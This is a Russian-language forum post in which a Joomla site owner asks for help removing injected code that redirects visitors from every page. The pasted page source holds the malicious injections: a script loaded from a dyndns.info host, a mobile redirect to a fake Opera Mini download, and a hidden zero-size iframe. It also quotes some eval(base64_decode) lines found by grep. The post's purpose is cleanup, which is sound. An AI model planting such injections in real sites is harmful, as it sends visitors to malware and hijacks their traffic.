Взломали переадресация со всех страниц

Помогите пожалуйста! Вчера обнаружил переадресацию со своего сайта на какой-то левый...

Внедрили код, никак не могу избавится. Переадресует со всех страниц.
Бэкап видимо уже с внедрением...
Начинается со строки с dyndns
grep -R dyndns * - в одном месте нашел, удалил, но все равно переадресует

Может ли firebug показать из какого файла внедряется код?
Если да, то как в нем это посмотреть?

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link type="text/css" href="/cache/wo/2630afd2ca.css?1285525165" rel="stylesheet">
<title lang="wo">Name.ru - сайт</title>
<script language="JavaScript" type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
<script type="text/javascript">
_uacct = "UA-XXXXXXXXXXX";
urchinTracker();
</script>
<script src="http://www.name.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2" type="text/javascript"></script>
<script src="http://www.name.ru/components/com_jcomments/libraries/joomlatune/ajax.js" type="text/javascript"></script>
<base href="http://www.name.ru/"/>
<link rel="alternate" type="application/rss+xml" title="name.Ru - сайт" href="http://www.name.ru/index2.php?option=com_rss&amp;feed=RSS2.0&amp;no_html=1"/>
<link rel="shortcut icon" href="http://www.recipe.ru/images/favicon.ico"/>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<link rel="shortcut icon" href="http://www.name.ru/templates/mbt_macro_blue/images/favicon.ico"/>


-----------Вот скрипт-------------
<nofollow><script language='JavaScript' src=http://se4fegwv1.dyndns.info/infon.php?i=22322></script></nofollow><script>
function Valid(){
frm = document.forms['formSearch'];
if(frm.searchword.value == '' || frm.searchword.value == 'Search ...'){
alert('Please input search condition.');
return false;
}
return true;
}

function submitForm(){
if (Valid())
document.forms['formSearch'].submit();
}
</script>
</head>
<script type="text/javascript">
if(navigator.userAgent.match(/(symbos|windows mobile|smartphone|blackberry|ppc|midp|windows ce|mtk|j2me|symbian|series 60|android)/i)!==null)
window.location = "http://fileozon.com/opera_mini/7920/opera_mini.auto"; </script>
<BODY>
<table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="white">
<iframe src="http://www.name.ru/new/jom.php" width="0" height="0" align="left">
</iframe>


<!-- START HEADER: TOP MODULE+PATHWAY+HEADER IMAGE+SEARCH-->
<tr>
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="3">
<tr>
<td id="top_outer">
<div id="top">
<table width="99%" cellspacing="0" cellpadding="0"><tr><td>
<form action="index.php?option=com_search&amp;Itemid=11" method="get">
<div class="search">
<input name="searchword" id="mod_search_searchword" maxlength="20" alt="search" class="inputbox" type="text" size="20" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';"/> </div>
<input type="hidden" name="option" value="com_search"/>
<input type="hidden" name="Itemid" value="11"/>
</form> </td><td width="15" style="padding-top:1px !important;padding-top:2px;"><img src="http://www.name.ru/templates/mbt_macro_blue/images/search.gif" width="15" height="15" vspace="0" hspace="0" onclick="document.forms[0].submit()" style="cursor:hand;cursorointer"></td></tr></table>
</div>
</td>
<td id="pathway_outer" colspan="2">
<!-- START TOP MENU -->

 

Т.е. подозрительные моменты это

administrator/components/com_installer/component/jcomments.class.php: $tmpl->addGlobalVar('support', base64_decode('PGEgaHJlZj0iaHR0cDovL3d3dy5qb29tbGF0dW5lLnJ1IiB0aXRsZT0iSkNvbW1lbnRzIiB0YXJnZXQ9Il9ibGFuayI+SkNvbW1lbnRzPC9hPg=='));

administrator/components/com_installer/mambot/web-optimizer/libs/php/css.sprites.php: @fwrite($fp, base64_decode(preg_replace("/.*;base64,/", "", $this->css_image)));
administrator/components/com_sef/sef.class.php: eval(base64_decode('JHNlZkRpckFkbWluID0gJEdMT0JBTFNbJ21vc0NvbmZpZ19hYnNvbHV0ZV9wYXRoJ10uJy9hZG1pbmlzdHJhdG9yL2NvbXBvbmVudHMvY29tX3NlZi8nOwovLyBsb2FkIGNoZWNrc3VtcwokbGljZW5zZSAgPSB0cmltKEBmaWxlX2dldF9jb250ZW50cygkc2VmRGlyQWRtaW4uJ3NpZ25hdHVyZS5iNjQnKSk7CiRjaGVja3N1 и далее страница символов...

 

Подозрительными можно считать только те вхождения, которые включают base64_decode с кодом типа этого JHNlZkRpckFkbWluID0gJEdMT0JBTF или и другие вхождения?Те, которые с кодом удалил и в одном месте закомментировал, т.к. не уверен во вредоносности, но код все равно вставляется.